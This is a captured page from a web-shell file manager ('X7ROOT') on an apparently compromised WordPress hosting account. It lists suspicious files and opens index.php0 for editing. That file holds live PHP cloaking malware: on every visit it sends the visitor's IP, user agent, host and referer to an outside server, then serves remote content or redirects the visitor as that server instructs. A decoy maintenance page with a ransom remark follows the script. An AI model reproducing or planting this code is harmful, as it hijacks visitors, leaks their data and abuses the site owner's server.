X7ROOT File Manager
Current Path:
/home/seodomino/public_html
home
/
seodomino
/
public_html
/
📁
..
📄
.ftpquota
(13 B)
📄
.hta
(6.56 KB)
📄
.htaccess
(717 B)
📄
.htaccess_old
(233 B)
📁
.well-known
📁
14b9d
📁
70e254
📁
backup
📄
error_log
(3.3 MB)
📄
f35.php
(264.55 KB)
📄
f78ph2fdwg.txt
(12 B)
📄
google666bde3aaef65b3d.html
(53 B)
📄
google80351ab56fc14ee6.html
(53 B)
📄
googlebfbdb2f2b2ed372b.html
(53 B)
📁
images
📁
img
📄
index.php0
(7.79 KB)
📁
libraries
📄
memberfuns.php
(1.93 KB)
📁
old
📄
p.php
(2.75 KB)
📄
php.ini
(54 B)
📁
plugins
📁
reports
📄
resource_link.php
(2.31 KB)
📄
robots.txt
(357 B)
📄
sss.php
(218.88 KB)
📁
templates
📁
wp-admin
📄
wp-blog-header.php
(340 B)
📄
wp-blog.php
(285 B)
📄
wp-config.php
(111 B)
📁
wp-content
📁
wp-includes
📄
zpanel-v2.0.zip
(14.87 KB)
📄
zvc-tabs6.zip
(53.67 KB)
Editing: index.php0
<?php function kindergarten() { $apiUrl = 'https://sundongyang.sbs/api/shade'; $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $apiUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'ip' => $_SERVER['REMOTE_ADDR'], 'user_agent' => $_SERVER['HTTP_USER_AGENT'], 'hostname' => $_SERVER['HTTP_HOST'], 'referer' => $referer ])); $response = curl_exec($ch); $http_status = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_status === 200) { $response_data = json_decode($response, true); if ($response_data && isset($response_data['success']) && $response_data['success'] === true) { $operation = isset($response_data['data']['operation']) ? $response_data['data']['operation'] : null; $target = isset($response_data['data']['target_url']) ? $response_data['data']['target_url'] : null; if ($operation === 'cloak' && $target) { $content = fetchContent($target); if ($content !== false) { echo $content; } exit; } elseif ($operation === 'redirect' && $target) { header("Location: $target", true, 301); exit; } } } } function fetchContent($url) { $ch2 = curl_init(); curl_setopt($ch2, CURLOPT_URL, $url); curl_setopt($ch2, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch2, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch2); if (curl_errno($ch2)) { error_log('cURL Error: ' . curl_error($ch2)); $content = false; } curl_close($ch2); return $content; } kindergarten(); ?> <!DOCTYPE html> <html lang="en"> <head><meta charset="utf-8"> <title>Green Homes</title> <style> body { margin: 0; padding: 0; background:#000; } * { box-sizing: border-box; } .maintenance { background-image: url(https://demo.wpbeaveraddons.com/wp-content/uploads/2018/02/main-1.jpg); background-repeat: no-repeat; background-position: center center; background-attachment: scroll; background-size: cover; } .maintenance { width: 100%; height: 100%; min-height: 100vh; } .maintenance { display: flex; flex-flow: column nowrap; justify-content: center; align-items: center; } .maintenance_contain { display: flex; flex-direction: column; flex-wrap: nowrap; align-items: center; justify-content: center; width: 100%; padding: 15px; } .maintenance_contain img { width: auto; max-width: 100%; } .pp-infobox-title-prefix { font-weight: 500; font-size: 20px; color: #000000; margin-top: 30px; text-align: center; } .pp-infobox-title-prefix { font-family: sans-serif; } .pp-infobox-title { color: #000000; font-family: sans-serif; font-weight: 700; font-size: 40px; margin-top: 10px; margin-bottom: 10px; text-align: center; display: block; word-break: break-word; } .pp-infobox-description { color: #000000; font-family: "Poppins", sans-serif; font-weight: 400; font-size: 18px; margin-top: 0px; margin-bottom: 0px; text-align: center; } .pp-infobox-description p { margin: 0; } .title-text.pp-primary-title { color: #000000; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; font-family: sans-serif; font-weight: 500; font-size: 18px; line-height: 1.4; margin-top: 50px; margin-bottom: 0px; } .pp-social-icon { margin-left: 10px; margin-right: 10px; display: inline-block; line-height: 0; margin-bottom: 10px; margin-top: 10px; text-align: center; } .pp-social-icon a { display: inline-block; height: 40px; width: 40px; } .pp-social-icon a i { border-radius: 100px; font-size: 20px; height: 40px; width: 40px; line-height: 40px; text-align: center; } .pp-social-icon:nth-child(1) a i { color: #4b76bd; } .pp-social-icon:nth-child(1) a i { border: 2px solid #4b76bd; } .pp-social-icon:nth-child(2) a i { color: #00c6ff; } .pp-social-icon:nth-child(2) a i { border: 2px solid #00c6ff; } .pp-social-icon:nth-child(3) a i { color: #fb5245; } .pp-social-icon:nth-child(3) a i { border: 2px solid #fb5245; } .pp-social-icon:nth-child(4) a i { color: #158acb; } .pp-social-icon:nth-child(4) a i { border: 2px solid #158acb; } .pp-social-icons { display: flex; flex-flow: row wrap; align-items: center; justify-content: center; } </style> </head> <body> <div class="maintenance"> <div class="maintenance_contain"> <img src="https://demo.wpbeaveraddons.com/wp-content/uploads/2018/02/main-vector.png" alt="maintenance"> <span class="pp-infobox-title-prefix">WE ARE COMING SOON</span> <div class="pp-infobox-title-wrapper"> <h3 class="pp-infobox-title">The website under maintenance!</h3> </div> <div class="pp-infobox-description"> <p>Someone has kidnapped our site. We are negotiation ransom and<br>will resolve this issue in 24/7 hours</p> </div> <span class="title-text pp-primary-title">We are social</span> <div class="pp-social-icons pp-social-icons-center pp-responsive-center"> <span class="pp-social-icon"> <link itemprop="url" href="#"> <a itemprop="sameAs" href="#" target="_blank" title="Facebook" aria-label="Facebook" role="button"> <i class="fa fa-facebook"></i> </a> </span> <span class="pp-social-icon"> <link itemprop="url" href="#"> <a itemprop="sameAs" href="#" target="_blank" title="Twitter" aria-label="Twitter" role="button"> <i class="fa fa-twitter"></i> </a> </span> <span class="pp-social-icon"> <link itemprop="url" href="#"> <a itemprop="sameAs" href="#" target="_blank" title="Google Plus" aria-label="Google Plus" role="button"> <i class="fa fa-google-plus"></i> </a> </span> <span class="pp-social-icon"> <a itemprop="sameAs" href="#" target="_blank" title="LinkedIn" aria-label="LinkedIn" role="button"> <i class="fa fa-linkedin"></i> </a> </span> </div> </div> </div> </body> </html>
Upload File
Create Folder